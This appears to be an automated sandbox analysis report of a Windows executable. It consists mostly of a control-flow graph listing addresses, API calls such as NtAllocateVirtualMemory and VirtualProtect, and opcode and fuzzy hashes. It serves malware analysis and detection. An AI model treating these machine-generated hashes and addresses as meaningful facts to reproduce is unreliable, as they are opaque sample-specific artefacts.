7ff6cd201394 2 API calls 4220->4221 4222 7ff6cd2015a3 4221->4222 4223 7ff6cd2015a8 4222->4223 4224 7ff6cd201394 2 API calls 4222->4224 4225 7ff6cd201394 2 API calls 4223->4225 4224->4223 4226 7ff6cd2015b7 4225->4226 4227 7ff6cd201394 2 API calls 4226->4227 4228 7ff6cd2015c1 4227->4228 4229 7ff6cd2015c6 4228->4229 4230 7ff6cd201394 2 API calls 4228->4230 4231 7ff6cd201394 2 API calls 4229->4231 4230->4229 4232 7ff6cd2015d0 4231->4232 4233 7ff6cd2015d5 4232->4233 4234 7ff6cd201394 2 API calls 4232->4234 4235 7ff6cd201394 2 API calls 4233->4235 4234->4233 4236 7ff6cd2015df 4235->4236 4237 7ff6cd2015e4 4236->4237 4238 7ff6cd201394 2 API calls 4236->4238 4239 7ff6cd201394 2 API calls 4237->4239 4238->4237 4240 7ff6cd2015f3 4239->4240 4240->4035 4242 7ff6cd201394 2 API calls 4241->4242 4243 7ff6cd20142c 4242->4243 4244 7ff6cd201431 4243->4244 4245 7ff6cd201394 2 API calls 4243->4245 4246 7ff6cd201394 2 API calls 4244->4246 4245->4244 4247 7ff6cd20143b 4246->4247 4248 7ff6cd201440 4247->4248 4249 7ff6cd201394 2 API calls 4247->4249 4250 7ff6cd201394 2 API calls 4248->4250 4249->4248 4251 7ff6cd20144f 4250->4251 4252 7ff6cd201394 2 API calls 4251->4252 4253 7ff6cd201459 4252->4253 4254 7ff6cd20145e 4253->4254 4255 7ff6cd201394 2 API calls 4253->4255 4256 7ff6cd201394 2 API calls 4254->4256 4255->4254 4257 7ff6cd201468 4256->4257 4258 7ff6cd20146d 4257->4258 4259 7ff6cd201394 2 API calls 4257->4259 4260 7ff6cd201394 2 API calls 4258->4260 4259->4258 4261 7ff6cd201477 4260->4261 4262 7ff6cd20147c 4261->4262 4263 7ff6cd201394 2 API calls 4261->4263 4264 7ff6cd201394 2 API calls 4262->4264 4263->4262 4265 7ff6cd201486 4264->4265 4266 7ff6cd20148b 4265->4266 4267 7ff6cd201394 2 API calls 4265->4267 4268 7ff6cd201394 2 API calls 4266->4268 4267->4266 4269 7ff6cd201495 4268->4269 4270 7ff6cd20149a 4269->4270 4271 7ff6cd201394 2 API calls 4269->4271 4272 7ff6cd201394 2 API calls 4270->4272 4271->4270 4273 7ff6cd2014a4 4272->4273 4274 7ff6cd2014a9 4273->4274 4275 7ff6cd201394 2 API calls 4273->4275 4276 7ff6cd201394 2 API calls 4274->4276 4275->4274 4277 7ff6cd2014b3 4276->4277 4278 7ff6cd2014b8 4277->4278 4279 7ff6cd201394 2 API calls 4277->4279 4280 7ff6cd201394 2 API calls 4278->4280 4279->4278 4281 7ff6cd2014c2 4280->4281 4282 7ff6cd2014c7 4281->4282 4283 7ff6cd201394 2 API calls 4281->4283 4284 7ff6cd201394 2 API calls 4282->4284 4283->4282 4285 7ff6cd2014d6 4284->4285 4286 7ff6cd201394 2 API calls 4285->4286 4287 7ff6cd2014e0 4286->4287 4288 7ff6cd2014e5 4287->4288 4289 7ff6cd201394 2 API calls 4287->4289 4290 7ff6cd201394 2 API calls 4288->4290 4289->4288 4291 7ff6cd2014ef 4290->4291 4292 7ff6cd2014f4 4291->4292 4293 7ff6cd201394 2 API calls 4291->4293 4294 7ff6cd201394 2 API calls 4292->4294 4293->4292 4295 7ff6cd2014fe 4294->4295 4296 7ff6cd201394 2 API calls 4295->4296 4297 7ff6cd201503 4296->4297 4298 7ff6cd201394 2 API calls 4297->4298 4299 7ff6cd201512 4298->4299 4300 7ff6cd201394 2 API calls 4299->4300 4301 7ff6cd201521 4300->4301 4302 7ff6cd201530 4301->4302 4303 7ff6cd201394 2 API calls 4301->4303 4304 7ff6cd201394 2 API calls 4302->4304 4303->4302 4305 7ff6cd20153a 4304->4305 4306 7ff6cd20153f 4305->4306 4307 7ff6cd201394 2 API calls 4305->4307 4308 7ff6cd201394 2 API calls 4306->4308 4307->4306 4309 7ff6cd20154e 4308->4309 4310 7ff6cd201394 2 API calls 4309->4310 4311 7ff6cd201558 4310->4311 4312 7ff6cd20155d 4311->4312 4313 7ff6cd201394 2 API calls 4311->4313 4314 7ff6cd201394 2 API calls 4312->4314 4313->4312 4315 7ff6cd201567 4314->4315 4316 7ff6cd20156c 4315->4316 4317 7ff6cd201394 2 API calls 4315->4317 4318 7ff6cd201394 2 API calls 4316->4318 4317->4316 4319 7ff6cd201576 4318->4319 4320 7ff6cd20157b 4319->4320 4321 7ff6cd201394 2 API calls 4319->4321 4322 7ff6cd201394 2 API calls 4320->4322 4321->4320 4323 7ff6cd201585 4322->4323 4324 7ff6cd20158a 4323->4324 4325 7ff6cd201394 2 API calls 4323->4325 4326 7ff6cd201394 2 API calls 4324->4326 4325->4324 4327 7ff6cd201599 4326->4327 4328 7ff6cd201394 2 API calls 4327->4328 4329 7ff6cd2015a3 4328->4329 4330 7ff6cd2015a8 4329->4330 4331 7ff6cd201394 2 API calls 4329->4331 4332 7ff6cd201394 2 API calls 4330->4332 4331->4330 4333 7ff6cd2015b7 4332->4333 4334 7ff6cd201394 2 API calls 4333->4334 4335 7ff6cd2015c1 4334->4335 4336 7ff6cd2015c6 4335->4336 4337 7ff6cd201394 2 API calls 4335->4337 4338 7ff6cd201394 2 API calls 4336->4338 4337->4336 4339 7ff6cd2015d0 4338->4339 4340 7ff6cd2015d5 4339->4340 4341 7ff6cd201394 2 API calls 4339->4341 4342 7ff6cd201394 2 API calls 4340->4342 4341->4340 4343 7ff6cd2015df 4342->4343 4344 7ff6cd2015e4 4343->4344 4345 7ff6cd201394 2 API calls 4343->4345 4346 7ff6cd201394 2 API calls 4344->4346 4345->4344 4347 7ff6cd2015f3 4346->4347 4347->3907 4349 7ff6cd201394 2 API calls 4348->4349 4350 7ff6cd20143b 4349->4350 4351 7ff6cd201440 4350->4351 4352 7ff6cd201394 2 API calls 4350->4352 4353 7ff6cd201394 2 API calls 4351->4353 4352->4351 4354 7ff6cd20144f 4353->4354 4355 7ff6cd201394 2 API calls 4354->4355 4356 7ff6cd201459 4355->4356 4357 7ff6cd20145e 4356->4357 4358 7ff6cd201394 2 API calls 4356->4358 4359 7ff6cd201394 2 API calls 4357->4359 4358->4357 4360 7ff6cd201468 4359->4360 4361 7ff6cd20146d 4360->4361 4362 7ff6cd201394 2 API calls 4360->4362 4363 7ff6cd201394 2 API calls 4361->4363 4362->4361 4364 7ff6cd201477 4363->4364 4365 7ff6cd20147c 4364->4365 4366 7ff6cd201394 2 API calls 4364->4366 4367 7ff6cd201394 2 API calls 4365->4367 4366->4365 4368 7ff6cd201486 4367->4368 4369 7ff6cd20148b 4368->4369 4370 7ff6cd201394 2 API calls 4368->4370 4371 7ff6cd201394 2 API calls 4369->4371 4370->4369 4372 7ff6cd201495 4371->4372 4373 7ff6cd20149a 4372->4373 4374 7ff6cd201394 2 API calls 4372->4374 4375 7ff6cd201394 2 API calls 4373->4375 4374->4373 4376 7ff6cd2014a4 4375->4376 4377 7ff6cd2014a9 4376->4377 4378 7ff6cd201394 2 API calls 4376->4378 4379 7ff6cd201394 2 API calls 4377->4379 4378->4377 4380 7ff6cd2014b3 4379->4380 4381 7ff6cd2014b8 4380->4381 4382 7ff6cd201394 2 API calls 4380->4382 4383 7ff6cd201394 2 API calls 4381->4383 4382->4381 4384 7ff6cd2014c2 4383->4384 4385 7ff6cd2014c7 4384->4385 4386 7ff6cd201394 2 API calls 4384->4386 4387 7ff6cd201394 2 API calls 4385->4387 4386->4385 4388 7ff6cd2014d6 4387->4388 4389 7ff6cd201394 2 API calls 4388->4389 4390 7ff6cd2014e0 4389->4390 4391 7ff6cd2014e5 4390->4391 4392 7ff6cd201394 2 API calls 4390->4392 4393 7ff6cd201394 2 API calls 4391->4393 4392->4391 4394 7ff6cd2014ef 4393->4394 4395 7ff6cd2014f4 4394->4395 4396 7ff6cd201394 2 API calls 4394->4396 4397 7ff6cd201394 2 API calls 4395->4397 4396->4395 4398 7ff6cd2014fe 4397->4398 4399 7ff6cd201394 2 API calls 4398->4399 4400 7ff6cd201503 4399->4400 4401 7ff6cd201394 2 API calls 4400->4401 4402 7ff6cd201512 4401->4402 4403 7ff6cd201394 2 API calls 4402->4403 4404 7ff6cd201521 4403->4404 4405 7ff6cd201530 4404->4405 4406 7ff6cd201394 2 API calls 4404->4406 4407 7ff6cd201394 2 API calls 4405->4407 4406->4405 4408 7ff6cd20153a 4407->4408 4409 7ff6cd20153f 4408->4409 4410 7ff6cd201394 2 API calls 4408->4410 4411 7ff6cd201394 2 API calls 4409->4411 4410->4409 4412 7ff6cd20154e 4411->4412 4413 7ff6cd201394 2 API calls 4412->4413 4414 7ff6cd201558 4413->4414 4415 7ff6cd20155d 4414->4415 4416 7ff6cd201394 2 API calls 4414->4416 4417 7ff6cd201394 2 API calls 4415->4417 4416->4415 4418 7ff6cd201567 4417->4418 4419 7ff6cd20156c 4418->4419 4420 7ff6cd201394 2 API calls 4418->4420 4421 7ff6cd201394 2 API calls 4419->4421 4420->4419 4422 7ff6cd201576 4421->4422 4423 7ff6cd20157b 4422->4423 4424 7ff6cd201394 2 API calls 4422->4424 4425 7ff6cd201394 2 API calls 4423->4425 4424->4423 4426 7ff6cd201585 4425->4426 4427 7ff6cd20158a 4426->4427 4428 7ff6cd201394 2 API calls 4426->4428 4429 7ff6cd201394 2 API calls 4427->4429 4428->4427 4430 7ff6cd201599 4429->4430 4431 7ff6cd201394 2 API calls 4430->4431 4432 7ff6cd2015a3 4431->4432 4433 7ff6cd2015a8 4432->4433 4434 7ff6cd201394 2 API calls 4432->4434 4435 7ff6cd201394 2 API calls 4433->4435 4434->4433 4436 7ff6cd2015b7 4435->4436 4437 7ff6cd201394 2 API calls 4436->4437 4438 7ff6cd2015c1 4437->4438 4439 7ff6cd2015c6 4438->4439 4440 7ff6cd201394 2 API calls 4438->4440 4441 7ff6cd201394 2 API calls 4439->4441 4440->4439 4442 7ff6cd2015d0 4441->4442 4443 7ff6cd2015d5 4442->4443 4444 7ff6cd201394 2 API calls 4442->4444 4445 7ff6cd201394 2 API calls 4443->4445 4444->4443 4446 7ff6cd2015df 4445->4446 4447 7ff6cd2015e4 4446->4447 4448 7ff6cd201394 2 API calls 4446->4448 4449 7ff6cd201394 2 API calls 4447->4449 4448->4447 4450 7ff6cd2015f3 4449->4450 4450->3910 4452 7ff6cd201394 2 API calls 4451->4452 4453 7ff6cd2014c2 4452->4453 4454 7ff6cd2014c7 4453->4454 4455 7ff6cd201394 2 API calls 4453->4455 4456 7ff6cd201394 2 API calls 4454->4456 4455->4454 4457 7ff6cd2014d6 4456->4457 4458 7ff6cd201394 2 API calls 4457->4458 4459 7ff6cd2014e0 4458->4459 4460 7ff6cd2014e5 4459->4460 4461 7ff6cd201394 2 API calls 4459->4461 4462 7ff6cd201394 2 API calls 4460->4462 4461->4460 4463 7ff6cd2014ef 4462->4463 4464 7ff6cd2014f4 4463->4464 4465 7ff6cd201394 2 API calls 4463->4465 4466 7ff6cd201394 2 API calls 4464->4466 4465->4464 4467 7ff6cd2014fe 4466->4467 4468 7ff6cd201394 2 API calls 4467->4468 4469 7ff6cd201503 4468->4469 4470 7ff6cd201394 2 API calls 4469->4470 4471 7ff6cd201512 4470->4471 4472 7ff6cd201394 2 API calls 4471->4472 4473 7ff6cd201521 4472->4473 4474 7ff6cd201530 4473->4474 4475 7ff6cd201394 2 API calls 4473->4475 4476 7ff6cd201394 2 API calls 4474->4476 4475->4474 4477 7ff6cd20153a 4476->4477 4478 7ff6cd20153f 4477->4478 4479 7ff6cd201394 2 API calls 4477->4479 4480 7ff6cd201394 2 API calls 4478->4480 4479->4478 4481 7ff6cd20154e 4480->4481 4482 7ff6cd201394 2 API calls 4481->4482 4483 7ff6cd201558 4482->4483 4484 7ff6cd20155d 4483->4484 4485 7ff6cd201394 2 API calls 4483->4485 4486 7ff6cd201394 2 API calls 4484->4486 4485->4484 4487 7ff6cd201567 4486->4487 4488 7ff6cd20156c 4487->4488 4489 7ff6cd201394 2 API calls 4487->4489 4490 7ff6cd201394 2 API calls 4488->4490 4489->4488 4491 7ff6cd201576 4490->4491 4492 7ff6cd20157b 4491->4492 4493 7ff6cd201394 2 API calls 4491->4493 4494 7ff6cd201394 2 API calls 4492->4494 4493->4492 4495 7ff6cd201585 4494->4495 4496 7ff6cd20158a 4495->4496 4497 7ff6cd201394 2 API calls 4495->4497 4498 7ff6cd201394 2 API calls 4496->4498 4497->4496 4499 7ff6cd201599 4498->4499 4500 7ff6cd201394 2 API calls 4499->4500 4501 7ff6cd2015a3 4500->4501 4502 7ff6cd2015a8 4501->4502 4503 7ff6cd201394 2 API calls 4501->4503 4504 7ff6cd201394 2 API calls 4502->4504 4503->4502 4505 7ff6cd2015b7 4504->4505 4506 7ff6cd201394 2 API calls 4505->4506 4507 7ff6cd2015c1 4506->4507 4508 7ff6cd2015c6 4507->4508 4509 7ff6cd201394 2 API calls 4507->4509 4510 7ff6cd201394 2 API calls 4508->4510 4509->4508 4511 7ff6cd2015d0 4510->4511 4512 7ff6cd2015d5 4511->4512 4513 7ff6cd201394 2 API calls 4511->4513 4514 7ff6cd201394 2 API calls 4512->4514 4513->4512 4515 7ff6cd2015df 4514->4515 4516 7ff6cd2015e4 4515->4516 4517 7ff6cd201394 2 API calls 4515->4517 4518 7ff6cd201394 2 API calls 4516->4518 4517->4516 4519 7ff6cd2015f3 4518->4519 4519->3994 4521 7ff6cd201394 2 API calls 4520->4521 4522 7ff6cd2015df 4521->4522 4523 7ff6cd2015e4 4522->4523 4524 7ff6cd201394 2 API calls 4522->4524 4525 7ff6cd201394 2 API calls 4523->4525 4524->4523 4526 7ff6cd2015f3 4525->4526 4526->3994 4528 7ff6cd201394 2 API calls 4527->4528 4529 7ff6cd201495 4528->4529 4530 7ff6cd20149a 4529->4530 4531 7ff6cd201394 2 API calls 4529->4531 4532 7ff6cd201394 2 API calls 4530->4532 4531->4530 4533 7ff6cd2014a4 4532->4533 4534 7ff6cd2014a9 4533->4534 4535 7ff6cd201394 2 API calls 4533->4535 4536 7ff6cd201394 2 API calls 4534->4536 4535->4534 4537 7ff6cd2014b3 4536->4537 4538 7ff6cd2014b8 4537->4538 4539 7ff6cd201394 2 API calls 4537->4539 4540 7ff6cd201394 2 API calls 4538->4540 4539->4538 4541 7ff6cd2014c2 4540->4541 4542 7ff6cd2014c7 4541->4542 4543 7ff6cd201394 2 API calls 4541->4543 4544 7ff6cd201394 2 API calls 4542->4544 4543->4542 4545 7ff6cd2014d6 4544->4545 4546 7ff6cd201394 2 API calls 4545->4546 4547 7ff6cd2014e0 4546->4547 4548 7ff6cd2014e5 4547->4548 4549 7ff6cd201394 2 API calls 4547->4549 4550 7ff6cd201394 2 API calls 4548->4550 4549->4548 4551 7ff6cd2014ef 4550->4551 4552 7ff6cd2014f4 4551->4552 4553 7ff6cd201394 2 API calls 4551->4553 4554 7ff6cd201394 2 API calls 4552->4554 4553->4552 4555 7ff6cd2014fe 4554->4555 4556 7ff6cd201394 2 API calls 4555->4556 4557 7ff6cd201503 4556->4557 4558 7ff6cd201394 2 API calls 4557->4558 4559 7ff6cd201512 4558->4559 4560 7ff6cd201394 2 API calls 4559->4560 4561 7ff6cd201521 4560->4561 4562 7ff6cd201530 4561->4562 4563 7ff6cd201394 2 API calls 4561->4563 4564 7ff6cd201394 2 API calls 4562->4564 4563->4562 4565 7ff6cd20153a 4564->4565 4566 7ff6cd20153f 4565->4566 4567 7ff6cd201394 2 API calls 4565->4567 4568 7ff6cd201394 2 API calls 4566->4568 4567->4566 4569 7ff6cd20154e 4568->4569 4570 7ff6cd201394 2 API calls 4569->4570 4571 7ff6cd201558 4570->4571 4572 7ff6cd20155d 4571->4572 4573 7ff6cd201394 2 API calls 4571->4573 4574 7ff6cd201394 2 API calls 4572->4574 4573->4572 4575 7ff6cd201567 4574->4575 4576 7ff6cd20156c 4575->4576 4577 7ff6cd201394 2 API calls 4575->4577 4578 7ff6cd201394 2 API calls 4576->4578 4577->4576 4579 7ff6cd201576 4578->4579 4580 7ff6cd20157b 4579->4580 4581 7ff6cd201394 2 API calls 4579->4581 4582 7ff6cd201394 2 API calls 4580->4582 4581->4580 4583 7ff6cd201585 4582->4583 4584 7ff6cd20158a 4583->4584 4585 7ff6cd201394 2 API calls 4583->4585 4586 7ff6cd201394 2 API calls 4584->4586 4585->4584 4587 7ff6cd201599 4586->4587 4588 7ff6cd201394 2 API calls 4587->4588 4589 7ff6cd2015a3 4588->4589 4590 7ff6cd2015a8 4589->4590 4591 7ff6cd201394 2 API calls 4589->4591 4592 7ff6cd201394 2 API calls 4590->4592 4591->4590 4593 7ff6cd2015b7 4592->4593 4594 7ff6cd201394 2 API calls 4593->4594 4595 7ff6cd2015c1 4594->4595 4596 7ff6cd2015c6 4595->4596 4597 7ff6cd201394 2 API calls 4595->4597 4598 7ff6cd201394 2 API calls 4596->4598 4597->4596 4599 7ff6cd2015d0 4598->4599 4600 7ff6cd2015d5 4599->4600 4601 7ff6cd201394 2 API calls 4599->4601 4602 7ff6cd201394 2 API calls 4600->4602 4601->4600 4603 7ff6cd2015df 4602->4603 4604 7ff6cd2015e4 4603->4604 4605 7ff6cd201394 2 API calls 4603->4605 4606 7ff6cd201394 2 API calls 4604->4606 4605->4604 4607 7ff6cd2015f3 4606->4607 4607->3987 4608 7ff6cd20149a 4607->4608 4609 7ff6cd201394 2 API calls 4608->4609 4610 7ff6cd2014a4 4609->4610 4611 7ff6cd2014a9 4610->4611 4612 7ff6cd201394 2 API calls 4610->4612 4613 7ff6cd201394 2 API calls 4611->4613 4612->4611 4614 7ff6cd2014b3 4613->4614 4615 7ff6cd2014b8 4614->4615 4616 7ff6cd201394 2 API calls 4614->4616 4617 7ff6cd201394 2 API calls 4615->4617 4616->4615 4618 7ff6cd2014c2 4617->4618 4619 7ff6cd2014c7 4618->4619 4620 7ff6cd201394 2 API calls 4618->4620 4621 7ff6cd201394 2 API calls 4619->4621 4620->4619 4622 7ff6cd2014d6 4621->4622 4623 7ff6cd201394 2 API calls 4622->4623 4624 7ff6cd2014e0 4623->4624 4625 7ff6cd2014e5 4624->4625 4626 7ff6cd201394 2 API calls 4624->4626 4627 7ff6cd201394 2 API calls 4625->4627 4626->4625 4628 7ff6cd2014ef 4627->4628 4629 7ff6cd2014f4 4628->4629 4630 7ff6cd201394 2 API calls 4628->4630 4631 7ff6cd201394 2 API calls 4629->4631 4630->4629 4632 7ff6cd2014fe 4631->4632 4633 7ff6cd201394 2 API calls 4632->4633 4634 7ff6cd201503 4633->4634 4635 7ff6cd201394 2 API calls 4634->4635 4636 7ff6cd201512 4635->4636 4637 7ff6cd201394 2 API calls 4636->4637 4638 7ff6cd201521 4637->4638 4639 7ff6cd201530 4638->4639 4640 7ff6cd201394 2 API calls 4638->4640 4641 7ff6cd201394 2 API calls 4639->4641 4640->4639 4642 7ff6cd20153a 4641->4642 4643 7ff6cd20153f 4642->4643 4644 7ff6cd201394 2 API calls 4642->4644 4645 7ff6cd201394 2 API calls 4643->4645 4644->4643 4646 7ff6cd20154e 4645->4646 4647 7ff6cd201394 2 API calls 4646->4647 4648 7ff6cd201558 4647->4648 4649 7ff6cd20155d 4648->4649 4650 7ff6cd201394 2 API calls 4648->4650 4651 7ff6cd201394 2 API calls 4649->4651 4650->4649 4652 7ff6cd201567 4651->4652 4653 7ff6cd20156c 4652->4653 4654 7ff6cd201394 2 API calls 4652->4654 4655 7ff6cd201394 2 API calls 4653->4655 4654->4653 4656 7ff6cd201576 4655->4656 4657 7ff6cd20157b 4656->4657 4658 7ff6cd201394 2 API calls 4656->4658 4659 7ff6cd201394 2 API calls 4657->4659 4658->4657 4660 7ff6cd201585 4659->4660 4661 7ff6cd20158a 4660->4661 4662 7ff6cd201394 2 API calls 4660->4662 4663 7ff6cd201394 2 API calls 4661->4663 4662->4661 4664 7ff6cd201599 4663->4664 4665 7ff6cd201394 2 API calls 4664->4665 4666 7ff6cd2015a3 4665->4666 4667 7ff6cd2015a8 4666->4667 4668 7ff6cd201394 2 API calls 4666->4668 4669 7ff6cd201394 2 API calls 4667->4669 4668->4667 4670 7ff6cd2015b7 4669->4670 4671 7ff6cd201394 2 API calls 4670->4671 4672 7ff6cd2015c1 4671->4672 4673 7ff6cd2015c6 4672->4673 4674 7ff6cd201394 2 API calls 4672->4674 4675 7ff6cd201394 2 API calls 4673->4675 4674->4673 4676 7ff6cd2015d0 4675->4676 4677 7ff6cd2015d5 4676->4677 4678 7ff6cd201394 2 API calls 4676->4678 4679 7ff6cd201394 2 API calls 4677->4679 4678->4677 4680 7ff6cd2015df 4679->4680 4681 7ff6cd2015e4 4680->4681 4682 7ff6cd201394 2 API calls 4680->4682 4683 7ff6cd201394 2 API calls 4681->4683 4682->4681 4684 7ff6cd2015f3 4683->4684 4684->3987 4684->3998 4686 7ff6cd201394 2 API calls 4685->4686 4687 7ff6cd201486 4686->4687 4688 7ff6cd20148b 4687->4688 4689 7ff6cd201394 2 API calls 4687->4689 4690 7ff6cd201394 2 API calls 4688->4690 4689->4688 4691 7ff6cd201495 4690->4691 4692 7ff6cd20149a 4691->4692 4693 7ff6cd201394 2 API calls 4691->4693 4694 7ff6cd201394 2 API calls 4692->4694 4693->4692 4695 7ff6cd2014a4 4694->4695 4696 7ff6cd2014a9 4695->4696 4697 7ff6cd201394 2 API calls 4695->4697 4698 7ff6cd201394 2 API calls 4696->4698 4697->4696 4699 7ff6cd2014b3 4698->4699 4700 7ff6cd2014b8 4699->4700 4701 7ff6cd201394 2 API calls 4699->4701 4702 7ff6cd201394 2 API calls 4700->4702 4701->4700 4703 7ff6cd2014c2 4702->4703 4704 7ff6cd2014c7 4703->4704 4705 7ff6cd201394 2 API calls 4703->4705 4706 7ff6cd201394 2 API calls 4704->4706 4705->4704 4707 7ff6cd2014d6 4706->4707 4708 7ff6cd201394 2 API calls 4707->4708 4709 7ff6cd2014e0 4708->4709 4710 7ff6cd2014e5 4709->4710 4711 7ff6cd201394 2 API calls 4709->4711 4712 7ff6cd201394 2 API calls 4710->4712 4711->4710 4713 7ff6cd2014ef 4712->4713 4714 7ff6cd2014f4 4713->4714 4715 7ff6cd201394 2 API calls 4713->4715 4716 7ff6cd201394 2 API calls 4714->4716 4715->4714 4717 7ff6cd2014fe 4716->4717 4718 7ff6cd201394 2 API calls 4717->4718 4719 7ff6cd201503 4718->4719 4720 7ff6cd201394 2 API calls 4719->4720 4721 7ff6cd201512 4720->4721 4722 7ff6cd201394 2 API calls 4721->4722 4723 7ff6cd201521 4722->4723 4724 7ff6cd201530 4723->4724 4725 7ff6cd201394 2 API calls 4723->4725 4726 7ff6cd201394 2 API calls 4724->4726 4725->4724 4727 7ff6cd20153a 4726->4727 4728 7ff6cd20153f 4727->4728 4729 7ff6cd201394 2 API calls 4727->4729 4730 7ff6cd201394 2 API calls 4728->4730 4729->4728 4731 7ff6cd20154e 4730->4731 4732 7ff6cd201394 2 API calls 4731->4732 4733 7ff6cd201558 4732->4733 4734 7ff6cd20155d 4733->4734 4735 7ff6cd201394 2 API calls 4733->4735 4736 7ff6cd201394 2 API calls 4734->4736 4735->4734 4737 7ff6cd201567 4736->4737 4738 7ff6cd20156c 4737->4738 4739 7ff6cd201394 2 API calls 4737->4739 4740 7ff6cd201394 2 API calls 4738->4740 4739->4738 4741 7ff6cd201576 4740->4741 4742 7ff6cd20157b 4741->4742 4743 7ff6cd201394 2 API calls 4741->4743 4744 7ff6cd201394 2 API calls 4742->4744 4743->4742 4745 7ff6cd201585 4744->4745 4746 7ff6cd20158a 4745->4746 4747 7ff6cd201394 2 API calls 4745->4747 4748 7ff6cd201394 2 API calls 4746->4748 4747->4746 4749 7ff6cd201599 4748->4749 4750 7ff6cd201394 2 API calls 4749->4750 4751 7ff6cd2015a3 4750->4751 4752 7ff6cd2015a8 4751->4752 4753 7ff6cd201394 2 API calls 4751->4753 4754 7ff6cd201394 2 API calls 4752->4754 4753->4752 4755 7ff6cd2015b7 4754->4755 4756 7ff6cd201394 2 API calls 4755->4756 4757 7ff6cd2015c1 4756->4757 4758 7ff6cd2015c6 4757->4758 4759 7ff6cd201394 2 API calls 4757->4759 4760 7ff6cd201394 2 API calls 4758->4760 4759->4758 4761 7ff6cd2015d0 4760->4761 4762 7ff6cd2015d5 4761->4762 4763 7ff6cd201394 2 API calls 4761->4763 4764 7ff6cd201394 2 API calls 4762->4764 4763->4762 4765 7ff6cd2015df 4764->4765 4766 7ff6cd2015e4 4765->4766 4767 7ff6cd201394 2 API calls 4765->4767 4768 7ff6cd201394 2 API calls 4766->4768 4767->4766 4769 7ff6cd2015f3 4768->4769 4769->4003 4771 7ff6cd201394 2 API calls 4770->4771 4772 7ff6cd2015d0 4771->4772 4773 7ff6cd2015d5 4772->4773 4774 7ff6cd201394 2 API calls 4772->4774 4775 7ff6cd201394 2 API calls 4773->4775 4774->4773 4776 7ff6cd2015df 4775->4776 4777 7ff6cd2015e4 4776->4777 4778 7ff6cd201394 2 API calls 4776->4778 4779 7ff6cd201394 2 API calls 4777->4779 4778->4777 4780 7ff6cd2015f3 4779->4780 4780->3984 4830 7ff6cd202320 strlen 4831 7ff6cd202337 4830->4831 4854 7ff6cd201000 4855 7ff6cd20108b __set_app_type 4854->4855 4856 7ff6cd201040 4854->4856 4858 7ff6cd2010b6 4855->4858 4856->4855 4857 7ff6cd2010e5 4858->4857 4860 7ff6cd201e00 4858->4860 4861 7ff6cd2089b0 __setusermatherr 4860->4861 4862 7ff6cd201800 4863 7ff6cd201812 4862->4863 4864 7ff6cd201835 fprintf 4863->4864 4832 7ff6cd20219e 4833 7ff6cd202272 4832->4833 4834 7ff6cd2021ab EnterCriticalSection 4832->4834 4835 7ff6cd202265 LeaveCriticalSection 4834->4835 4837 7ff6cd2021c8 4834->4837 4835->4833 4836 7ff6cd2021e9 TlsGetValue GetLastError 4836->4837 4837->4835 4837->4836 2951 7ff6cd201394 2955 7ff6cd208420 2951->2955 2953 7ff6cd2013b8 2954 7ff6cd2013c6 NtAllocateVirtualMemory 2953->2954 2956 7ff6cd20843e 2955->2956 2959 7ff6cd20846b 2955->2959 2956->2953 2957 7ff6cd208513 2958 7ff6cd20852f malloc 2957->2958 2960 7ff6cd208550 2958->2960 2959->2956 2959->2957 2960->2956 4838 7ff6cd201ab3 4839 7ff6cd201ade 4838->4839 4840 7ff6cd201b36 4839->4840 4842 7ff6cd20199e 4839->4842 4843 7ff6cd201a0f 4839->4843 4841 7ff6cd201ba0 4 API calls 4840->4841 4841->4843 4842->4843 4844 7ff6cd2019e9 VirtualProtect 4842->4844 4844->4842 4793 7ff6cd201a70 4794 7ff6cd20199e 4793->4794 4797 7ff6cd201a7d 4793->4797 4795 7ff6cd201a0f 4794->4795 4796 7ff6cd2019e9 VirtualProtect 4794->4796 4796->4794 4815 7ff6cd202050 4816 7ff6cd2020cf 4815->4816 4817 7ff6cd20205e EnterCriticalSection 4815->4817 4818 7ff6cd2020c2 LeaveCriticalSection 4817->4818 4819 7ff6cd202079 4817->4819 4818->4816 4819->4818 4820 7ff6cd2020bd free 4819->4820 4820->4818 4821 7ff6cd201fd0 4822 7ff6cd201fe4 4821->4822 4823 7ff6cd202033 4821->4823 4822->4823 4824 7ff6cd201ffd EnterCriticalSection LeaveCriticalSection 4822->4824 4824->4823 4865 7ff6cd201e10 4866 7ff6cd201e2f 4865->4866 4867 7ff6cd201e55 4866->4867 4868 7ff6cd201ecc 4866->4868 4869 7ff6cd201eb5 4866->4869 4867->4869 4873 7ff6cd201f12 signal 4867->4873 4868->4869 4870 7ff6cd201ed3 signal 4868->4870 4870->4869 4871 7ff6cd201ee4 4870->4871 4871->4869 4872 7ff6cd201eea signal 4871->4872 4872->4869 4873->4869 4798 7ff6cd20216f 4799 7ff6cd202185 4798->4799 4800 7ff6cd202178 InitializeCriticalSection 4798->4800 4800->4799 4825 7ff6cd201f47 4826 7ff6cd201e99 4825->4826 4827 7ff6cd201e67 signal 4825->4827 4827->4826 4828 7ff6cd201e7c 4827->4828 4828->4826 4829 7ff6cd201e82 signal 4828->4829 4829->4826

                                                                Executed Functions

                                                                Function 00007FF6CD201160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.1551652456.00007FF6CD201000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CD200000, based on PE: true
                                                                • Associated: 00000018.00000002.1551591965.00007FF6CD200000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1551683504.00007FF6CD209000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1551712506.00007FF6CD20B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1552000244.00007FF6CD484000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ff6cd200000_lzsbffridksl.jbxd
                                                                Similarity
                                                                • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                • String ID:
                                                                • API String ID: 2643109117-0
                                                                • Opcode ID: 0e6ca4d89b91c9777d4e8bda24571358cd04216e07cbc33493341518a02b717e
                                                                • Instruction ID: 38451f2913a93e2538cdfbae5ff0914704be7a6ef296a6c8b9ee48a9a35de105
                                                                • Opcode Fuzzy Hash: 0e6ca4d89b91c9777d4e8bda24571358cd04216e07cbc33493341518a02b717e
                                                                • Instruction Fuzzy Hash: 4A512135B09A8685F615AF15DAA037A67A1BF447C2F449036DBAEC73A2FF2CB4418341
